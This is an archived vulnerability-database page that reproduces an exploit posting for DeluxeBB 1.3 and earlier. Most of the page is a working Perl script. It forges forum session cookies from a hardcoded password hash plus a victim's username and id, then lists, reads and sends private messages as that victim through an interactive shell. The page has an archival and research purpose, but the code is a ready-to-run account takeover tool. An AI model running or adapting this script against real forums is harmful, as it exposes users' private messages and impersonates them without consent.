Vulners
Lucene search
DeluxeBB 1.3 Information Disclosure
🗓️ 09 Nov 2010 00:00:00Reported by Vis IntelligendiType 
packetstorm🔗 packetstormsecurity.com👁 22 Views
`======================================================================
DeluxeBB <= 1.3 Private Info Disclosure
Vis Intelligendi
======================================================================
VIS INTELLIGENDI http://vis-intelligendi.co.cc
Un hacker Ë principalmente un filosofo. Conoscenza.
======================================================================
Explanation:
details on http://vis-intelligendi.co.cc (search deluxebb)
======================================================================
Perl Exploit :
#!usr/bin/perl
# DeluxeBB 1.3 <= Info Disclosure ( pm.php )
# Vis Intelligendi.
use LWP::UserAgent;
use HTTP::Request;
use Switch;
my ($site,$membercookie,$memberid) = @ARGV;
my $memberpw = '6e6bc4e49dd477ebc98ef4046c067b5f'; #ciao \\ Inutile
my $inbox = '/pm?sub=folder&name=inbox';
my $outbox = '/pm?sub=folder&name=outbox';
my $general = '/pm.php';
my $new = '/pm.php?sub=newpm';
if (@ARGV < 3) { die "\n Usage: perl x.pl site nick id\n\n"; exit; }
&general;
sub broswer()
{
$bro = LWP::UserAgent->new();
$bro->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14");
$bro->default_header("Cookie" => "membercookie=$membercookie; memberpw=$memberpw; memberid=$memberid");
}
sub general()
{
&broswer;
$req = HTTP::Request->new(GET => $site.$general);
my $res = $bro->request($req);
$content = $res->content();
while ($content =~ /<span class="misctext">(\d*)<\/span><\/td>/g)
{
push(@pm,$1);
}
&splash_gen;
&sh;
}
sub splash()
{
print "--------------------------------------------\n";
print " DeluxeBB Info Disclosure <= 1.3 \n";
print " Vis Intelligendi \n";
print " http://vis-intelligendi.co.cc \n";
print "--------------------------------------------\n";
}
sub splash_gen()
{
system("clear");
&splash;
print "-------------------------------------------\n";
print " Site: $site \n";
print " General Pm of: $membercookie \n";
print "-------------------------------------------\n";
print " Read Unread \n\n";
print " Inbox : $pm[1] $pm[2] \n";
print " Outbox: $pm[3] $pm[4] \n";
print " Saves: $pm[5] $pm[6] \n";
print " Tracker: $pm[7] $pm[8] \n";
}
sub sh()
{
print "\n sh> "; $sh = <stdin>; chomp $sh;
switch($sh) {
case "help" { &sh::help; }
case "quit" { system "clear";exit(); }
case "inbox" { &inbox; }
case "outbox" { &outbox; }
case "new" { &newpm; }
case "read" { &read; }
}
}
sub sh::help() {
system("clear");
print q(
-----------------------------
DeluxeBB <= 1.3 Info Shell
-----------------------------
help - Leggi questo faq
quit - Termina exploit
inbox - Leggi inbox
outbox - Leggi outbox
read - Leggi pm
new - Scrivi pm
);
sleep(3);
&splash_gen; &sh;
}
sub inbox()
{
&broswer;
$req = HTTP::Request->new(GET => $site.$inbox);
$res = $bro->request($req);
$content = $res->content();
while ($content =~ /(pm.php\?sub=view&pid=\d*)">(.*)<\/a>/g) { push(@inbox_l,$1); push(@inbox_t,$2); }
while ($content =~ /misc.php\?sub=profile&name=(.*)">/g) { push(@inbox_f,$1); }
&splash;
print "--------------------------------------------------\n";
for my $indice (0..$#inbox_l)
{
$inbox_l[$indice] =~ s/amp;//g;
print " $inbox_l[$indice] - Title: $inbox_t[$indice] - From: $inbox_f[$indice]\n";
}
print "--------------------------------------------------\n";
(@inbox_l,@inbox_t,@inbox_f) = '';
&sh;
}
sub outbox()
{
&broswer;
$req = HTTP::Request->new(GET => $site.$outbox);
$res = $bro->request($req);
$content = $res->content();
while ($content =~ /(pm.php\?sub=view&pid=\d*)">(.*)<\/a>/g){ push(@outbox_l,$1); push(@outbox_t,$2); }
while ($content =~ /misc.php\?sub=profile&name=(.*)">/g) { push(@outbox_f,$1);}
&splash;
print "--------------------------------------------------\n";
for my $indice (0..$#outbox_l){
$outbox_l[$indice] =~ s/amp;//g;
print " $outbox_l[$indice] - Title: $outbox_t[$indice] - To: $outbox_f[$indice]\n";
}
print "--------------------------------------------------\n";
(@outbox_l,@outbox_t,@outbox_f) = '';
&sh;
}
sub read()
{
&broswer;
&splash;
print "\nInserire link pm: "; $link = <stdin>; chomp($link);
$req = HTTP::Request->new(GET => $site.$link);
$res = $bro->request($req);
$content = $res->content();
while ($content =~ /<span class="inputarea"><span class="inputarea">(.*)<\/span><\/span>/g) { push(@pm_r,$1); }
print "---------------------------------\n";
print " Reading PM: $site$link \n";
print " Of : $membercookie \n";
print "---------------------------------\n";
$pm_r[0] =~ s/<br \/>//g;
print @pm_r;
@pm_r = '';
&sh;
}
sub newpm
{
system("cls");
&splash;
print "\nTo:"; $to = <stdin>;
print "\nTitle:"; $tit = <stdin>;
print "\nContent:"; $contnet = <stdin>;
chomp($to,$tit,$contnet);
&broswer;
$res = $bro->post($site.$new,["to" => $to, "subject" => $tit, "posticon" => 'bigsmile.gif', "rte1" => $contnet, "submit" => 'Send']);
print "\n Sended pm to $to from $membercookie\n ";
&sh;
}
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Nov 2010 00:00Current
7.4High risk
Vulners AI Score7.4